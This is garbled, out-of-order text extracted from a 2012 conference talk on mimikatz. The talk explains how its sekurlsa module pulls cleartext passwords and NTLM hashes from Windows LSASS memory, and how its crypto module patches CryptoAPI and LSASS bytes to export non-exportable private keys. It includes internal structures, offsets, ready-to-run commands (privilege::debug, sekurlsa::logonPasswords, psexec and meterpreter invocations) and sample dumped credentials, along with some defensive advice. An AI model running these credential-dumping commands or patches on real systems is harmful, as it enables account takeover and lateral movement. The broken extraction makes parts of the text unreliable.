kdgt x tspkgclear75016d1c tspkgTSObtainClearCreds = ltno type informationgtkdgt x tspkgpassword75011b68 tspkgTSDuplicatePassword = ltno type informationgt75011cd4 tspkgTSHidePassword = ltno type informationgt750195ee tspkgTSRevealPassword = ltno type informationgt75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgtkdgt x tspkglocate7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkgworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENTIAL
KIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0LSA_UNICODE_STRING DomaineLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64
BYTE unk0[108]elif defined _M_IX86
BYTE unk0[64]endif
LUID LocallyUniqueIdentifierPVOID unk1PVOID unk2PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary
KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIALKIWI_TS_CREDEN
TIAL
mimikatz sekurlsa tspkgdemo time
sekurlsatspkg
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15
mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16
mimikatz sekurlsa wdigestwhat is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquoWikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web sitendash Authenticated client access using SASLndash Authenticated client access with integrity protection to a directory service
using LDAPrdquoMicrosoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashesndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17
mimikatz sekurlsa wdigestwhat is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18
mimikatz sekurlsa wdigesttheory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digestndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemoryndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemoryndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLEndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in argsbull Protect it with LsaProtectMemorybull Update or insert data in double linked list wdigestl_LogSessList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigestworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flinkstruct _KIWI_WDIGEST_LIST_ENTRY BlinkDWORD UsageCountstruct _KIWI_WDIGEST_LIST_ENTRY ThisLUID LocallyUniqueIdentifier[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password[hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigestdemo time
sekurlsawdigest
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21
mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most users / Unavailable for computer keys
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi - how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
- cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API...
mimikatz crypto capi - how it's exported (PLAYSKOOL level)
[Diagram: inside the process, CryptoAPI and the RSA CSP load the private key (DPAPI decode); on "Ask to export key", the CSP checks the Exportable flag: yes -> Exported Key, no -> NTE_BAD_KEY_STATE]
mimikatz crypto patch capi - because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER\My'
 - Benjamin Delpy
	Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider       : Microsoft Enhanced Cryptographic Provider v1.0
	Type           : AT_KEYEXCHANGE
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
(Callout on the slide: Exportable? -> NON)
mimikatz crypto patch capi - because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz crypto patch capi - demo time
Import, export, import as not exportable... export!
mimikatz crypto patch capi - limitations
Because
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real-life use
  - Elliptic Curve a little...
mimikatz crypto::patchcapi only deals with
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz crypto cng - how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz crypto cng - how it's exported (PLAYSKOOL level)
[Diagram: the process calls CNG, which goes over RPC to the KeyIso Service (LSASS process, NT6 System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP); KeyIso loads the private key (DPAPI decode); on "Ask to export key" it checks the Exportable flag: yes -> Exported Key, no -> NTE_NOT_SUPPORTED]
mimikatz crypto patch cng - because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) / ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité  : NON
	Taille clé     : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
	mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK ; (0x80090029) L'opération demandée n'est pas prise en charge.
(Callout on the slide: Exportable? -> NON)
mimikatz crypto patch cng - because sometimes I own LSASS
This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz crypto patch cng - demo time
Import, export, import as not exportable... export again!
mimikatz crypto patch cng - limitations
Patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz crypto patch cng - bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
- Yeah, like the good old certutil
Before patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto - memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  - So yes, mimikatz can export it
mimikatz crypto - what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
- no admin, no admin, no admin...
Basics
- Use smartcards/tokens for users' certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with TPM from Windows 8
  - Virtual SmartCard seems promising
- Verify vendors' implementation (Lenovo, Dell, ...) of TPM CSP/KSP
  - Their biometrics stuff was a little buggy ;)
mimikatz - what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
- Play with tokens & privileges
- Display SSDT x86 & x64
- List minifilters actions
- List Notifications (process, thread, image, registry)
- List Objects hooks and procedures
- ...
...
mimikatz - that's all folks
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  - Partners and Sponsors, for sure
- Microsoft, to always consider it as normal/acceptable
- Security friends/community for their ideas & challenges
  - nagual, newsoft, mubix, ...
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz sekurlsa - what is it?
A module replacement for my previous favorite library
A local module that can read data from the SamSS Service (well known LSASS process)
What the sekurlsa module can dump
- MSV1_0 hashes
- TsPkg passwords
- Wdigest passwords
- LiveSSP passwords
- Kerberos passwords (!)
- ...
mod_mimikatz_sekurlsa
mimikatz sekurlsa - how LSA works (PLAYSKOOL level)
[Diagram: WinLogon passes user/domain/password to LsaSS; the Authentication Packages (msv1_0, tspkg, wdigest, livessp, kerberos) handle them; authentication itself is done by msv1_0 (against the SAM) and kerberos, by Challenge/Response]
mimikatz sekurlsa - how LSA works (PLAYSKOOL level)
Authentication packages
- take the user's credentials from the logon
- make their own stuff
- keep enough data in memory to compute responses to challenges (Single Sign On)
If we can get that data and inject it in another session of LSASS, we avoid the authentication part
This is the principle of « Pass-the-hash »
- In fact, of « Pass-the-x »
mimikatz sekurlsa - history of « pass-the-... » 1/2
Pass-the-hash
- 1997 - Unix: modified SAMBA client for hashes usage; Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor »; Hernan Ochoa (CoreSecurity)
- 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
- 2007 - « Pass the hash toolkit » published; Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French, so not famous ;))
2007 was the year of pass the hash!
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity)
mimikatz sekurlsa - history of « pass-the-... » 2/2
Pass-the-pass
- 05/2011 - mimikatz 1.0 dumps the first clear text passwords from the TsPkg provider (but limited to NT 6 and some XP SP3)
  - http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 - return of mimikatz: it dumps clear text passwords from the WDigest provider (unlimited this time ;))
  - http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 - Some organizations opened cases with Microsoft about it...
...Lots of time...
- beginning of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes on seclists that wce supports WDigest password extraction...
  - http://seclists.org/pen-test/2012/Mar/7
- 03/2012 - mimikatz strikes again with the LiveSSP provider and extracts Live login passwords from Windows 8 memory
  - http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 - yeah, once again... more curious, but Kerberos keeps passwords in memory
  - http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 - sekurlsa module without injection at all (ultra safe)
  - http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz sekurlsa tspkg
because sometimes the hash is not enough...
mimikatz sekurlsa tspkg - what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6, to improve RemoteApps and RemoteDesktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
It relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
- User does not have to type their password
- Password is not in the RDP file
- Password is not in user secrets
mimikatz sekurlsa tspkg - questions
